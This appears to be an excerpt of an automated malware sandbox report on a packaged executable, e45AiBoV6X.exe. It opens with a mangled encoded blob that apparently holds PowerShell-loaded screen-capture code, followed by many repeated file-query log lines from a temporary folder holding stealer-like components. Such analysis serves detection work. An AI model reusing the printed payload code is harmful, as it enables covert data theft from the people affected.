agacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,65_2_00007FF629B3B340
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB208880 cpuid 0_2_00007FF6FB208880
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\libcrypto-1_1.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\libffi-7.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\libssl-1_1.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\sqlite3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
